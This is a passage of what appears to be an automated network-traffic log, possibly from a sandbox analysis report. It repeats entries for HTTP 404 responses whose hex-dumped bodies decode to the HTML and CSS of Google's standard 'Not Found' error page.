65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:14:55 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:14:56 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:14:57 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:14:58 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:14:59 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:15:00 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
